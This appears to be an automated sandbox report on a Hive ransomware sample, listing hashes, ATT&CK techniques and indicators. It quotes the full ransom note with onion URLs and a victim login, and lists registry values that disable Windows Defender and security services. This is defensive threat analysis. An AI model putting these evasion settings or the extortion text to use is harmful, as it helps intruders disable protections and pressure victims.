hive | 62899c3f59b78d57a0211a9ffcb3701c28212595a63bdd4c932741f18aaabcf8

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
04/02/2025, 12:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
Size

3.7MB
MD5

a0c2c847f6fe20dac42d055859db98c2
SHA1

d6ceb3eafd82a4bdc45750ba81b6b8786757b031
SHA256

62899c3f59b78d57a0211a9ffcb3701c28212595a63bdd4c932741f18aaabcf8
SHA512

d8844f407474102dc6aebb4f75e2cee2fda89791c4cb3596b45c527a65fbbb1003de9b5cd4a7261f9a8bd4f76d45976fe24101b4746718ed0626358e9237596b
SSDEEP

49152:5sPL/C8t4Zgrb/TqvO90dL3BmAFd4A64nsfJhmr9uvVdytIbNqCue0g+eNgJBye7:KPzOZImrI9wMNbSYeOI

Score

10^/10

hive defense_evasion discovery evasion execution impact ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\ib68_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note

Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: bYccMiTYi9fN Password: 6XcWqaxeDfhA5cgKvXVP To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.ida2v files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

defense_evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
1676	MpCmdRun.exe

Disables service(s) 3 TTPs
defense_evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Hive
A ransomware written in Golang first seen in June 2021.
ransomware hive
Hive family
hive

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs

defense_evasion ransomware

Clear Windows Event Logs

T1070.001

pid	Process
2016	wevtutil.exe
844	wevtutil.exe
1692	wevtutil.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
572	bcdedit.exe
892	bcdedit.exe

Renames multiple (1841) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Renames multiple (5644) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes itself 1 IoCs

pid	Process
2524	cmd.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2216	powershell.exe
2908	powershell.exe

Modifies Security services 2 TTPs 6 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\6.png	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\CLICK.WAV.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-over-select.png	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\gadget.xml	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_ButtonGraphic.png	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\ja-JP\FreeCell.exe.mui.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00414_.WMF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\ib68_HOW_TO_DECRYPT.txt	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGBARBLL.DPV.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NEWSHM.POC.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099178.WMF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00170_.WMF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15134_.GIF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\de-DE\msadcer.dll.mui	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00262_.WMF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01141_.WMF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Perspective.eftx.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Internet Explorer\ie9props.propdesc	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Macquarie.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\ib68_HOW_TO_DECRYPT.txt	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Windows Media Player\ja-JP\wmlaunch.exe.mui	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD01193_.WMF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\slideShow.html	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\localizedStrings.js	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\mscss7wre_fr.dub.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Internet Explorer\en-US\F12Tools.dll.mui	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREQ.CFG.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Groove.en-us\ib68_HOW_TO_DECRYPT.txt	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSOUC_F_COL.HXK.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_COL.HXT.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ADRESPEL.POC.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_title.png	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\on_desktop\slideshow_glass_frame.png	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099153.WMF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212685.WMF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Martinique.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS01634_.WMF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188669.WMF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\bckgzm.exe.mui.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02158_.WMF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21307_.GIF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK_COL.HXT.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.htm	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18231_.WMF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_AAAAAAAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\TAB_ON.GIF.pVmqmWoX2zcq4b9qFq41txGmGqhnqZ52L8RbI93OZ4r_IAAAACAAAAA0.ida2v	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssLogo.gif	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\11.png	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2656	sc.exe
2168	sc.exe
2276	sc.exe
2732	sc.exe
2948	sc.exe
2752	sc.exe
2504	sc.exe
2616	sc.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2524	cmd.exe
2200	PING.EXE

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
588	vssadmin.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1000	notepad.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2200	PING.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2216	powershell.exe
2908	powershell.exe
2192	2025-02-04_a0c2c847f6fe20dac42d055859db98c2_frostygoop_hive_luca-stealer_snatch.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	1692	wevtutil.exe
Token: SeBackupPrivilege	1692	wevtutil.exe
Token: SeSecurityPrivilege	2016	wevtutil.exe
Token: SeBackupPrivilege	2016	wevtutil.exe
Token: SeSecurityPrivilege	844	wevtutil.exe
Token: SeBackupPrivilege	844	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	772	wmic.exe
Token: SeSecurityPrivilege	772	wmic.exe
Token: SeTakeOwnershipPrivilege	772	wmic.exe
Token: SeLoadDriverPrivilege	772	wmic.exe
Token: SeSystemProfilePrivilege	772	wmic.exe
Token: SeSystemtimePrivilege	772	wmic.exe
Token: SeProfSingleProcessPrivilege	772	wmic.exe
Token: SeIncBasePriorityPrivilege	772	wmic.exe
Token: SeCreatePagefilePrivilege	772	wmic.exe
Token: SeBackupPrivilege	772	wmic.exe
Token: SeRestorePrivilege	772	wmic.exe
Token: SeShutdownPrivilege	772	wmic.exe
Token: SeDebugPrivilege	772	wmic.exe
Token: SeSystemEnvironmentPrivilege	772	wmic.exe
Token: SeRemoteShutdownPrivilege	772	wmic.exe
Token: SeUndockPrivilege	772	wmic.exe
Token: SeManageVolumePrivilege	772	wmic.exe
Token: 33	772	wmic.exe
Token: 34	772	wmic.exe
Token: 35	772	wmic.exe
Token: SeIncreaseQuotaPrivilege	2036	wmic.exe
Token: SeSecurityPrivilege	2036	wmic.exe
Token: SeTakeOwnershipPrivilege	2036	wmic.exe
Token: SeLoadDriverPrivilege	2036	wmic.exe
Token: SeSystemProfilePrivilege	2036	wmic.exe
Token: SeSystemtimePrivilege	2036	wmic.exe
Token: SeProfSingleProcessPrivilege	2036	wmic.exe
Token: SeIncBasePriorityPrivilege	2036	wmic.exe
Token: SeCreatePagefilePrivilege	2036	wmic.exe
Token: SeBackupPrivilege	2036	wmic.exe
Token: SeRestorePrivilege	2036	wmic.exe
Token: SeShutdownPrivilege	2036	wmic.exe
Token: SeDebugPrivilege	2036	wmic.exe
Token: SeSystemEnvironmentPrivilege	2036	wmic.exe
Token: SeRemoteShutdownPrivilege	2036	wmic.exe
Token: SeUndockPrivilege	2036	wmic.exe
Token: SeManageVolumePrivilege	2036	wmic.exe
Token: 33	2036	wmic.exe
Token: 34	2036	wmic.exe
Token: 35	2036	wmic.exe
Token: SeIncreaseQuotaPrivilege	2036	wmic.exe
Token: SeSecurityPrivilege	2036	wmic.exe
Token: SeTakeOwnershipPrivilege	2036	wmic.exe
Token: SeLoadDriverPrivilege	2036	wmic.exe
Token: SeSystemProfilePrivilege	2036	wmic.exe
Token: SeSystemtimePrivilege	2036	wmic.exe
Token: SeProfSingleProcessPrivilege	2036	wmic.exe
Token: SeIncBasePriorityPrivilege	2036	wmic.exe
Token: SeCreatePagefilePrivilege	2036	wmic.exe
Token: SeBackupPrivilege	2036	wmic.exe
Token: SeRestorePrivilege	2036	wmic.exe
Token: SeShutdownPrivilege	2036	wmic.exe
Token: SeDebugPrivilege	2036	wmic.exe
Token: SeSystemEnvironmentPrivilege	2036	wmic.exe
Token: SeRemoteShutdownPrivilege	2036	wmic.exe
Token: SeUndockPrivilege	2036	wmic.exe
Token: SeManageVolumePrivilege	2036	wmic.exe
Token: 33	2036	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

